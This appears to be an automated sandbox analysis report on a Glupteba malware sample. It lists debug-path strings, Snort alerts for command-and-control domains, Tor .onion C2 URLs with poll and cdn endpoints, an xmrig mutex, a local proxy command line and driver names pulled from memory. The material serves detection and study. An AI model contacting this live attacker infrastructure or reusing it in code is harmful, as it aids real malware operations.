Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Unable to locate the .pdb file in this location source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
Source: Binary string: The module signature does not match with .pdb signature. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: .pdb.dbg source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: '(EfiGuardDxe.pdbx source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ZZC:\winirun92 cedojuhexoy.pdb source: kdsyitkxmS.exe, 00000004.00000001.208199622621.0000000000401000.00000020.00000001.01000000.00000004.sdmp, kdsyitkxmS.exe, 0000000A.00000001.208335995035.0000000000401000.00000020.00000001.01000000.00000004.sdmp, csrss.exe, 00000014.00000001.208684568909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000017.00000001.208779570930.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000001F.00000001.208811296233.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000028.00000001.208833898384.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000002B.00000001.208860836082.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000032.00000001.208896227050.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: System.Management.pdb source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
Source: Binary string: System.Management.ni.pdb source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: or you do not have access permission to the .pdb location. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Transactions.pdb source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Transactions.ni.pdb source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
Source: Binary string: C:\winirun92 cedojuhexoy.pdb source: kdsyitkxmS.exe, 00000004.00000001.208199622621.0000000000401000.00000020.00000001.01000000.00000004.sdmp, kdsyitkxmS.exe, 0000000A.00000001.208335995035.0000000000401000.00000020.00000001.01000000.00000004.sdmp, csrss.exe, 00000014.00000001.208684568909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000017.00000001.208779570930.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000001F.00000001.208811296233.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000028.00000001.208833898384.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000002B.00000001.208860836082.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000032.00000001.208896227050.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: System.Numerics.pdb source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: System.Core.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp

Networking

Source: Traffic Snort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:49990 -> 185.82.216.50:443
Source: Traffic Snort IDS: 2045697 ET TROJAN DNS Query to Glupteba Domain (twopixis .com) 192.168.11.20:49827 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:49993 -> 185.82.216.50:443
Source: Traffic Snort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:49998 -> 185.82.216.50:443
Source: Traffic Snort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:50002 -> 185.82.216.50:443
Source: Traffic Snort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:50007 -> 185.82.216.50:443
Source: Traffic Snort IDS: 2045697 ET TROJAN DNS Query to Glupteba Domain (twopixis .com) 192.168.11.20:63997 -> 1.1.1.1:53
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d0c9d&uuid=ec87b504-92ea-4d22-a937-161700799581
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d0c9d&uuid=ec87b504-92ea-4d22-a937-161700799581erver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionPUser-Agent: Go-http-client/1.1
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionserver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion:80
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Fserver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionserver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion:80
Source: csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll
Source: csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: COMPUTERNAME=computerNUMBER_OF_PROCESSORS=16PROCESSOR_REVISION=9e0dPUBLIC=C:\Users\PublicSystemRoot=C:\WindowsC:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466xeSELECT BuildNumber FROM Win32_OperatingSystemGlobal\xmrigMUTEX31337http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollxennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exechallenge=e5ec22ece8aaafba&country_code=US&uuid=ec87b504-92ea-4d22-a937-161700799581server5.duniadekho.bar
Source: csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll
Source: csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: SELECT BuildNumber FROM Win32_OperatingSystemGlobal\xmrigMUTEX31337http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNPpuSomC.exeHKEY_USERS\S-1-5-21-3425316567-2969588382-3778222414-1001\Software\Microsoft\e4d2c4f7nnHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZ
Source: csrss.exe, 00000014.00000003.210671361655.000000000C4E6000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.mscLOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\LocalPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsC:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.msc
Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.exenhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.batstAppC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.cmdd2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.vbsd2c4f7http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.vbed2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.js4d2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.jsed2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.wshd2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.mscd2c4f7APPDATA=C:\Windows\system32\config\systemprofile\AppData\Roamingt\e4d2c4f7LOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\Local4d2c4f7PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 13, GenuineIntel7PROCESSOR_LEVEL=6TEMP=C:\Windows\TEMPTMP=C:\Windows\TEMPUSERDOMAIN=WORKGROUPUSERNAME=computer$windir=C:\WindowsZES_ENABLE_SYSMAN=1LOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\LocalPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 13, GenuineIntel
Source: csrss.exe, 00000014.00000003.210671361655.000000000C4E4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://duniadekho.barhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionCommonProgramW6432=C:\Program Files\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCommonProgramW6432=C:\Program Files\Common Files
Source: csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork 
is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
